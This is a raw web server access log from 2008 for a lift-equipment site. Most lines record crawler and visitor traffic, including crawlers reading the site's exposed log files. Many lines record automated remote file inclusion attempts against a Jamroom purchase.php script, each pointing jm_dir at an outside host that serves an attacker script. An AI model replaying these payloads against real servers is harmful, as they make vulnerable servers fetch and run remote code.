78.111.80.12 - - [31/Oct/2008:15:23:48 -0700] "GET /purchase.php?jamroom[jm_dir]=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
78.111.80.12 - - [31/Oct/2008:15:23:48 -0700] "GET /logs/access.log//purchase.php?jamroom[jm_dir]=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
78.111.80.12 - - [31/Oct/2008:15:23:48 -0700] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
70.251.198.208 - - [31/Oct/2008:16:05:13 -0700] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
70.251.198.208 - - [31/Oct/2008:16:05:13 -0700] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
89.159.202.119 - - [31/Oct/2008:16:12:12 -0700] "GET /logs/access.log HTTP/1.0" 200 25120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [31/Oct/2008:16:41:24 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:16:41:24 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.156.10.131 - - [31/Oct/2008:19:02:10 -0700] "GET /images/Castersforcart2.jpg HTTP/1.1" 404 275 "-" "Jakarta Commons-HttpClient/3.0.1" "autobutlerlifts.com"
64.156.10.131 - - [31/Oct/2008:19:02:10 -0700] "GET /images/ultracarjackplate.gif HTTP/1.1" 404 275 "-" "Jakarta Commons-HttpClient/3.0.1" "autobutlerlifts.com"
72.30.142.160 - - [31/Oct/2008:19:15:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
66.249.71.82 - - [31/Oct/2008:19:52:31 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:19:52:32 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [31/Oct/2008:19:52:32 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.39 - - [31/Oct/2008:20:05:31 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
216.158.1.198 - - [31/Oct/2008:20:17:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [31/Oct/2008:20:17:50 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.81 - - [31/Oct/2008:22:49:33 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:22:49:33 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:00:25:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:00:25:07 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:01:56:15 -0700] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [01/Nov/2008:04:17:18 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [01/Nov/2008:04:17:18 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
88.84.157.127 - - [01/Nov/2008:05:00:41 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
88.84.157.127 - - [01/Nov/2008:05:00:41 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
88.84.157.127 - - [01/Nov/2008:05:00:41 -0700] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
88.84.157.127 - - [01/Nov/2008:05:05:34 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
8.7.26.27 - - [01/Nov/2008:05:14:24 -0700] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
8.7.26.27 - - [01/Nov/2008:05:14:24 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
8.7.26.27 - - [01/Nov/2008:05:14:24 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
213.21.215.187 - - [01/Nov/2008:05:15:24 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
8.7.26.27 - - [01/Nov/2008:05:28:14 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vie.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
213.21.215.187 - - [01/Nov/2008:05:33:00 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.21.215.187 - - [01/Nov/2008:05:33:00 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.21.215.187 - - [01/Nov/2008:05:33:00 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
66.249.71.80 - - [01/Nov/2008:05:51:23 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [01/Nov/2008:05:51:23 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
213.21.215.187 - - [01/Nov/2008:06:04:39 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "autobutlerlifts.com"
213.21.215.187 - - [01/Nov/2008:06:04:40 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:06:35:59 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:06:35:59 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
69.218.218.169 - - [01/Nov/2008:07:13:50 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "autobutlerlifts.com"
69.218.218.169 - - [01/Nov/2008:07:13:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "autobutlerlifts.com"
69.218.218.169 - - [01/Nov/2008:07:14:24 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
69.218.218.169 - - [01/Nov/2008:07:14:24 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "autobutlerlifts.com"
64.1.215.164 - - [01/Nov/2008:08:10:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:09:21:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:09:21:20 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:09:49:55 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.82 - - [01/Nov/2008:09:50:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:09:50:28 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [01/Nov/2008:09:50:28 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [01/Nov/2008:11:11:10 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [01/Nov/2008:12:15:12 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [01/Nov/2008:12:15:12 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
24.12.114.247 - - [01/Nov/2008:13:28:55 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
208.80.194.27 - - [01/Nov/2008:14:20:30 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {705AD481-E51F-BC2B-7075-636E2EDC7B23}; .NET CLR 1.1.4322; ZangoToolbar 4.8.3)" "www.autobutlerlifts.com"
66.249.71.80 - - [01/Nov/2008:14:41:55 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
208.80.194.36 - - [01/Nov/2008:14:44:29 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; SpamBlockerUtility 4.6.1)" "autobutlerlifts.com"
71.70.230.53 - - [01/Nov/2008:14:55:32 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3); .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
71.70.230.53 - - [01/Nov/2008:14:55:33 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3); .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; .NET CLR 2.0.50727)" "autobutlerlifts.com"
71.70.230.53 - - [01/Nov/2008:14:55:57 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.autobutlerlifts.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3); .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:15:34:21 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:15:34:22 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
89.159.202.119 - - [01/Nov/2008:16:08:42 -0700] "GET /logs/access.log HTTP/1.0" 200 37428 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:17:46:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [01/Nov/2008:17:46:17 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.82 - - [01/Nov/2008:18:38:20 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:18:38:20 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [01/Nov/2008:20:46:29 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [01/Nov/2008:20:46:29 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [01/Nov/2008:22:56:18 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
82.194.71.192 - - [01/Nov/2008:23:00:26 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
88.84.145.169 - - [01/Nov/2008:23:07:24 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
82.194.71.192 - - [01/Nov/2008:23:24:00 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
82.194.71.192 - - [01/Nov/2008:23:24:00 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
82.194.71.192 - - [01/Nov/2008:23:24:00 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
88.84.145.169 - - [01/Nov/2008:23:45:49 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
88.84.145.169 - - [01/Nov/2008:23:45:49 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
88.84.145.169 - - [01/Nov/2008:23:45:50 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:00:22:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:00:22:24 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:00:24:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [02/Nov/2008:00:24:56 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:00:24:56 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
72.30.65.60 - - [02/Nov/2008:02:45:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
72.30.65.60 - - [02/Nov/2008:02:45:44 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:02:57:12 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:03:07:20 -0800] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [02/Nov/2008:03:07:42 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [02/Nov/2008:03:07:42 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
222.236.44.26 - - [02/Nov/2008:03:32:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.autobutlerlifts.com"
222.236.44.26 - - [02/Nov/2008:03:32:32 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.autobutlerlifts.com"
222.236.44.26 - - [02/Nov/2008:03:32:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.autobutlerlifts.com"
59.126.46.141 - - [02/Nov/2008:03:56:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.80 - - [02/Nov/2008:04:01:38 -0800] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
222.236.44.26 - - [02/Nov/2008:04:13:59 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gosgo.com/bbs/idxx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
222.236.44.26 - - [02/Nov/2008:04:14:00 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gosgo.com/bbs/idxx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
222.236.44.26 - - [02/Nov/2008:04:14:01 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gosgo.com/bbs/idxx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.41 - - [02/Nov/2008:04:28:33 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.39 - - [02/Nov/2008:04:28:34 -0800] "GET /logs/access_071031.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:04:33:44 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:04:33:44 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
59.126.46.141 - - [02/Nov/2008:04:58:54 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
59.126.46.141 - - [02/Nov/2008:04:58:55 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
59.126.46.141 - - [02/Nov/2008:04:58:56 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:05:00:49 -0800] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.39 - - [02/Nov/2008:05:05:35 -0800] "GET /logs/access_080331.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.41 - - [02/Nov/2008:05:07:40 -0800] "GET /logs/access_081001.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.41 - - [02/Nov/2008:05:08:03 -0800] "GET /logs/access.log HTTP/1.1" 200 47015 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.41 - - [02/Nov/2008:05:10:55 -0800] "GET /logs/access_080131.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
59.126.46.141 - - [02/Nov/2008:05:24:26 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
59.126.46.141 - - [02/Nov/2008:05:24:31 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.81 - - [02/Nov/2008:06:08:11 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:06:08:11 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
